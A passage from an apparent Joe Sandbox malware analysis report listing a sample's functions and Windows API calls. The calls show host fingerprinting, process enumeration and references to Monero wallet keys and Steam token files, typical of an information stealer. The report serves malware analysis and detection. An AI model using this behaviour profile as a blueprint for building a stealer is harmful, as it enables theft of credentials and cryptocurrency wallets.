?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC9309F

Part of subcall function 6CCB5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5B85
Part of subcall function 6CCB5B50: EnterCriticalSection.KERNEL32(6CD1F688,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5B90
Part of subcall function 6CCB5B50: LeaveCriticalSection.KERNEL32(6CD1F688,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5BD8
Part of subcall function 6CCB5B50: GetTickCount64.KERNEL32 ref: 6CCB5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC930BE

Part of subcall function 6CC930F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC93127
Part of subcall function 6CC930F0: __aulldiv.LIBCMT ref: 6CC93140

Part of subcall function 6CCCAB2A: __onexit.LIBCMT ref: 6CCCAB30

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: ac3b569d14abd20c0cde0b94dae438ea0dad17346ad476c2c748b59b0ab57418
Instruction ID: 6f10ce29fa1f7e12e8c2939ddc379d06d6307481fc2f25bc512923b16e30a802
Opcode Fuzzy Hash: ac3b569d14abd20c0cde0b94dae438ea0dad17346ad476c2c748b59b0ab57418
Instruction Fuzzy Hash: F9F02D22E2074897DB10DF7488522E67378AF6B114F101319E95C63D21FF3061DAC3C2

Function 00999470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00999484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 009994A5
CloseHandle.KERNEL32(00000000), ref: 009994AF

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: aa333041a830410d33de226d671cded3586db48d3b20d13a7b6a874426faa8a7
Instruction ID: 81f5711143299691def12dfe7dab46a00f3091cbc4b6ff29342d07b462f49d44
Opcode Fuzzy Hash: aa333041a830410d33de226d671cded3586db48d3b20d13a7b6a874426faa8a7
Instruction Fuzzy Hash: 69F03A7490020CEBDB05DFA4DC4AFED77B8EB0C704F004598BA1997290DAB06E85CB91

Function 00981110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0098112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00981132
ExitProcess.KERNEL32 ref: 00981143

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 63c3e0131c8c2876f0e0a56c21fb6ef3dfd0d44e66cb6ccbb77206b2e3c687a1
Instruction ID: ce56c24f5365428c2fa6afa1d2693fc2a711ba316c0f0e16544383c77a3805f9
Opcode Fuzzy Hash: 63c3e0131c8c2876f0e0a56c21fb6ef3dfd0d44e66cb6ccbb77206b2e3c687a1
Instruction Fuzzy Hash: 5CE0E670A4530CFBE7106BA09C0EF09767CAB08B05F104155F709B72D0DAB52A419799

Function 00991A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 00997500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00997542
Part of subcall function 00997500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0099757F
Part of subcall function 00997500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997603
Part of subcall function 00997500: RtlAllocateHeap.NTDLL(00000000), ref: 0099760A

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 00997690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009976A4
Part of subcall function 00997690: RtlAllocateHeap.NTDLL(00000000), ref: 009976AB

Part of subcall function 009977C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0099DBC0,000000FF,?,00991C99,00000000,?,0157D5C0,00000000,?), ref: 009977F2
Part of subcall function 009977C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0099DBC0,000000FF,?,00991C99,00000000,?,0157D5C0,00000000,?), ref: 009977F9

Part of subcall function 00997850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009811B7), ref: 00997880
Part of subcall function 00997850: RtlAllocateHeap.NTDLL(00000000), ref: 00997887
Part of subcall function 00997850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0099789F

Part of subcall function 009978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997910
Part of subcall function 009978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00997917
Part of subcall function 009978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0099792F

Part of subcall function 00997980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009A0E00,00000000,?), ref: 009979B0
Part of subcall function 00997980: RtlAllocateHeap.NTDLL(00000000), ref: 009979B7
Part of subcall function 00997980: GetLocalTime.KERNEL32(?,?,?,?,?,009A0E00,00000000,?), ref: 009979C4
Part of subcall function 00997980: wsprintfA.USER32 ref: 009979F3

Part of subcall function 00997A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0157D9C0,00000000,?,009A0E10,00000000,?,00000000,00000000), ref: 00997A63
Part of subcall function 00997A30: RtlAllocateHeap.NTDLL(00000000), ref: 00997A6A
Part of subcall function 00997A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0157D9C0,00000000,?,009A0E10,00000000,?,00000000,00000000,?), ref: 00997A7D

Part of subcall function 00997B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0157D9C0,00000000,?,009A0E10,00000000,?,00000000,00000000), ref: 00997B35

Part of subcall function 00997B90: GetKeyboardLayoutList.USER32(00000000,00000000,009A05AF), ref: 00997BE1
Part of subcall function 00997B90: LocalAlloc.KERNEL32(00000040,?), ref: 00997BF9
Part of subcall function 00997B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00997C0D
Part of subcall function 00997B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00997C62
Part of subcall function 00997B90: LocalFree.KERNEL32(00000000), ref: 00997D22

Part of subcall function 00997D80: GetSystemPowerStatus.KERNEL32(?), ref: 00997DAD

GetCurrentProcessId.KERNEL32(00000000,?,0157D640,00000000,?,009A0E24,00000000,?,00000000,00000000,?,0157DB10,00000000,?,009A0E20,00000000), ref: 0099207E

Part of subcall function 00999470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00999484
Part of subcall function 00999470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 009994A5
Part of subcall function 00999470: CloseHandle.KERNEL32(00000000), ref: 009994AF

Part of subcall function 00997E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00997E37
Part of subcall function 00997E00: RtlAllocateHeap.NTDLL(00000000), ref: 00997E3E
Part of subcall function 00997E00: RegOpenKeyExA.KERNEL32(80000002,0156B8F0,00000000,00020119,?), ref: 00997E5E
Part of subcall function 00997E00: RegQueryValueExA.KERNEL32(?,0157D780,00000000,00000000,000000FF,000000FF), ref: 00997E7F
Part of subcall function 00997E00: RegCloseKey.ADVAPI32(?), ref: 00997E92

Part of subcall function 00997F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00997FC9
Part of subcall function 00997F60: GetLastError.KERNEL32 ref: 00997FD8

Part of subcall function 00997ED0: GetSystemInfo.KERNEL32(009A0E2C), ref: 00997F00
Part of subcall function 00997ED0: wsprintfA.USER32 ref: 00997F16

Part of subcall function 00998100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0157D978,00000000,?,009A0E2C,00000000,?,00000000), ref: 00998130
Part of subcall function 00998100: RtlAllocateHeap.NTDLL(00000000), ref: 00998137
Part of subcall function 00998100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00998158
Part of subcall function 00998100: wsprintfA.USER32 ref: 009981AC

Part of subcall function 009987C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009A0E28,00000000,?), ref: 0099882F
Part of subcall function 009987C0: RtlAllocateHeap.NTDLL(00000000), ref: 00998836
Part of subcall function 009987C0: wsprintfA.USER32 ref: 00998850

Part of subcall function 00998320: RegOpenKeyExA.KERNEL32(00000000,0156CA50,00000000,00020019,00000000,009A05B6), ref: 009983A4

Part of subcall function 00998320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00998426
Part of subcall function 00998320: wsprintfA.USER32 ref: 00998459
Part of subcall function 00998320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0099847B
Part of subcall function 00998320: RegCloseKey.ADVAPI32(00000000), ref: 0099848C
Part of subcall function 00998320: RegCloseKey.ADVAPI32(00000000), ref: 00998499

Part of subcall function 00998680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009A05B7), ref: 009986CA
Part of subcall function 00998680: Process32First.KERNEL32(?,00000128), ref: 009986DE
Part of subcall function 00998680: Process32Next.KERNEL32(?,00000128), ref: 009986F3
Part of subcall function 00998680: CloseHandle.KERNEL32(?), ref: 00998761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0099265B

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: a26769697741323bc98e81efbf4d91a4fadc2ebb729e37a21ce2ea3a864609cd
Instruction ID: cd7cfd9a3730cd18a4cac4ccd4525b989dcf55f2ba197639cf3a0dc82d3c99f5
Opcode Fuzzy Hash: a26769697741323bc98e81efbf4d91a4fadc2ebb729e37a21ce2ea3a864609cd
Instruction Fuzzy Hash: 66720E72C20118AADF19FB95DC92FEEB37CEF94300F5442A9B51662051EF702B49CBA5

Function 00986D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14bab5777b5eeeedb1d744e9aff68c89b980ef2b5c72a99d3113d8acb7e839c2
Instruction ID: 216f87b689fa285d32f85eaa2b85e9b12ba617e95a85d5cf4849b8e44ce3d8ca
Opcode Fuzzy Hash: 14bab5777b5eeeedb1d744e9aff68c89b980ef2b5c72a99d3113d8acb7e839c2
Instruction Fuzzy Hash: 6F6126B5900218DFCB14EF94E988BEEB7B4BB48304F108598E519AB381D735EE94DF91

Function 00995100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 0099A820: lstrlen.KERNEL32(00984F05,?,?,00984F05,009A0DDE), ref: 0099A82B
Part of subcall function 0099A820: lstrcpy.KERNEL32(009A0DDE,00000000), ref: 0099A885

lstrlen.KERNEL32(00000000,00000000,009A0ACA), ref: 0099512A

Strings

steam_tokens.txt, xrefs: 0099513F

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: d24d3e18916a97f44110a25235326b2dc6eedf3f19be831f07166493f29b12e7
Instruction ID: 9a8c2a6b81dab9eceaf986fb01fc6e92fdd851cc27eafa325ae935afd421279b
Opcode Fuzzy Hash: d24d3e18916a97f44110a25235326b2dc6eedf3f19be831f07166493f29b12e7
Instruction Fuzzy Hash: C1F01971D2010867CF04FBB8EC57AEDB33CEBD4300F404268B81662492EF246A09C7E6

Function 00997ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(009A0E2C), ref: 00997F00
wsprintfA.USER32 ref: 00997F16

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
